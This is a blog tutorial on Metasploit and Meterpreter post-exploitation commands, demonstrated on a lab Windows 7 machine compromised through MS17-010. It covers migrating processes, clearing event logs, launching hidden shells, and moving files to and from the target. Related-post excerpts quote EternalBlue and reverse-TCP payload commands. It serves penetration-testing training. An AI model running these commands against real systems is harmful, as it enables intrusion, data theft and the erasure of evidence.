Quick Meterpreter and Metasploit tutorial - Core, System, Networking and File System usual commands

I thought that it would be useful, for some readers, if we review some of the most commonly used post-exploitation commands in Meterpreter and Metasploit.
In this first video, we will discuss the Core, System, Networking and File System commands.

LAB details - VM names and IP addresses


Kali6 (Kali Linux, attacker VM): 192.168.254.142
W7x64-1 (Windows 7, target VM): 192.168.254.70
W2008R21 (Windows 2008R2, Domain Controller): 192.168.254.99
Domain name: TESTLAB3

Exploitation process


The Windows 7 test machine is affected by the MS17-010 vulnerability. For exploitation, we will follow the steps detailed in the previous post:
MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Core and System commands


We will start with Core and System commands and obviously the first command should be ... HELP !  :-)

1. help

See below the help output for the Core and System commands:



2. sysinfo

Use "sysinfo" in order to get essential information about the target computer:
Machine name, Operating System, OS architecture (x86/x64), system language, domain name.


3. getuid

The Meterpreter server is running on the target computer, under a specific user context. That particular user context will determine the level of permissions that the attacker has on the target computer. Obviously, we would like to have the highest level of permissions (system / local admin).
The "getuid" command will display the user context used by Meterpreter.
In our case, Meterpreter is running as SYSTEM, therefore it has all the available permissions.


4. background

There are situations when we successfully exploit a target and we get to a Meterpreter prompt, but we need to get back to a Metasploit prompt in order to run different other commands, without disconnecting the previously established Meterpreter session.
In that situation we would run the "background" command. The Meterpreter session will be sent into background and we will get back to the Metasploit prompt. The Meterpreter session will stay connected in the background, waiting to be reactivated.


5. sessions -l (or sessions)

Let's say that we successfully exploited multiple targets and we have multiple Meterpreter sessions running in the background.
The "sessions" command, depending on the command option, will allow to list, resume or terminate the Meterpreter sessions. See all the available options in the picture below:


"sessions -l" (or "sessions") will list all the active Meterpreter sessions


A Meterpreter session is identified by the session ID number.
(Session ID is 1 in the picture shown above)

6. sessions -i <Session_ID>

This command will resume interaction with a Meterpreter session that was previously sent to background. We will get back to the Meterpreter prompt.


7. clearev

The "clearev" command will remove all the records from Event Log, on the target computer.


8. localtime

This command will display the date and time on the target computer


9. ps 

The "ps" command will list all the processes running on the target computer ...


Note that each process is identified by a process ID number or PID
Also, each process runs under a user context

For example - lsass.exe has PID 512 and runs under the SYSTEM user context

10. ps -U <user_context>

This command will list only the processes running under the specified user context

Example:
ps -U 'TESTLAB3\\testuser1'


11. ps -s

This command will list all the processes running under the SYSTEM user context



12. pgrep <Process_Name>

This command will return the PID for the specified process name

Example:
pgrep wordpad


13. getpid

The "getpid" command will return the PID under which the Meterpreter server is currently running



In this case, the PID is 1040

14. migrate <New_PID>

This command will migrate the Meterpreter server from the current process to a new process having <New_PID>

Example:
migrate 512


15. kill <PID>

This command will terminate a process running on the target computer, having the specified <PID>

Example:
kill 2920


16. pkill <Process_Name>

This command will terminate a process specified by name


17. getsystem

This command will attempt to elevate the Meterpreter permissions on the target machine to SYSTEM (local admin) level.
In our lab, Meterpreter is already running under the SYSTEM user context, so the "getsystem" command is not going to achieve anything.


18. shell

This command will launch a system command shell on the target machine. After that, we can run any commands directly on the target machine.
"exit" will terminate the command shell and we will get back to the Meterpreter prompt.


19.  execute

This command will execute a specified command or application on the target machine.
Check the available options in the picture below:


Example:
execute -f cmd.exe -i -H
will launch a command shell on the target machine. The process will be hidden from view and we can interact with the shell after creating it.


20. reboot

This command will reboot the target computer. See the available options in the picture below:



File System commands




21. show_mount

This command will list all the logical drives and mount points available on the target computer


22. lpwd

The "lpwd" command will display the local working directory, on the Kali computer


23. lcd <New_Path>

This command allows changing the local working directory to <New_Path>

Example:
lcd /root/TEMP


24. pwd

"pwd" will display the remote working directory, on the target machine


25. cd <New_Path>

This command will change the remote working directory to <New_Path>

Example:
cd \



Note: Some File System commands will use by default the local and/or remote working directories, unless a particular directory is specified.  

26. dir or ls

This command will list the files located in the remote working directory (on the target computer)



Of course, we can also use this command by specifying a particular directory. 

27. cat <File_Name>

The "cat" command will display the contents of the specified file, to the screen

Example cat test1.txt


28. search

This command will search for a specified file or file pattern on the target computer

Example:
search -f *.txt -d 'c:\\TMP'
will search for text files into the c:\TMP directory (on the target computer)


29. edit

This command will edit the specified file

Example:
edit C:\\TMP\\test1.txt
Use :qa! to exit


30. download

This command will download files from the target computer to the local Kali computer

Examples:
download c:\\tmp\\test1.txt
will download the c:\tmp\test1.txt file to the local working directory.
download *.jpg
will download the jpeg files located into the remote working directory, to the local working directory


31. rm

The "rm" command will delete the specified file(s) from the target computer

Example:
rm test3.txt


32. upload

This command will upload files from the local Kali computer to the target computer.

Example:
upload test3.txt
will upload the test3.txt file located in the local working directory, to the remote working directory, on the target computer



Networking commands



33. arp

This command will display the arp cache on the target computer


34. ipconfig or ifconfig

This command will display the network interfaces and the ip configuration, on the target computer


35. netstat

This command will provide information about protocols in use and network connections, on the target computer 


36. route

This command will display and edit the routing table, on the target computer


37. resolve

This command will resolve host names, on the target computer

Example:
resolve w2008r21
will resolve the "w2008r21" name (that's the lab DC name)


Quick Meterpreter and Metasploit tutorial

Core, System, Networking and File System usual commands


Comments

Post a comment

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Image
Previously we identified the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module . In the video below we will exploit the MS17-010 vulnerability by using the EternalBlue Metasploit module which comes by default with Metasploit Framework. Metasploit commands used in this video: search ms17_010 This command identifies modules containing the "ms17_010" string. use exploit/windows/smb/ms17_010_eternalblue This command selects the "exploit/windows/smb/ms17_010_eternalblue" module. show options This command displays the options available for the selected module. set processname lsass.exe This commands selects the process to inject the payload into. set rhost <IP_Address> This command sets the target IP address. show payloads This command (when is executed under the module context), shows the payloads compatible with the selected module. set payload windows/x64/meterpreter/reverse_tcp This command select
Read more

Generating shellcode - using msfvenom to generate a binary payload

Image
In this video we generate a binary payload (shellcode) that we will use later on to exploit the EternalBlue Windows OS vulnerability. The article below is an excellent introduction to how a binary payload works: https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/ Our payload has 2 parts that will be generated independently, then combined into a single file. The first component is the Windows x64 kernel shellcode for Eternalblue exploit and the ASM code is downloaded from the following location: https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501 We will use "nasm" (general-purpose x86 assembler) on Kali Linux, in order to compile the kernel shellcode, by using the command below: nasm -f bin eternalblue_x64_kshellcode.asm -o sc_x64_kernel.bin The output for this command (and the first component for our payload) is the "sc_x64_kernel.bin" file. The second component for our payload, is the part of the code which will create t
Read more

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux

Image
In the video below we will identify computers affected by the MS17-010 vulnerability, by  using a Metasploit auxiliary scanning module. Check also my other post on detecting the MS17-010 vulnerability by using NMAP. MS17-010 is a severe SMB Server vulnerability which affected all Windows operating systems and was exploited by WannaCry, Petya and Bad Rabbit Ransomware. This vulnerability was made public in March 2017 and allowed remote code execution on the victim computer.  For more information, check the Microsoft Security Bulletin MS17-010: https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010 https://support.microsoft.com/en-au/help/4013389/title Metasploit commands used in this video: search name:ms17_010  This command lists the Metasploit modules containing the string "ms17_010" in the name.  Can also simply use: search ms17_010 use auxiliary/scanner/smb/smb_ms17_010 This command selects the module "auxiliary/scanner/smb/sm
Read more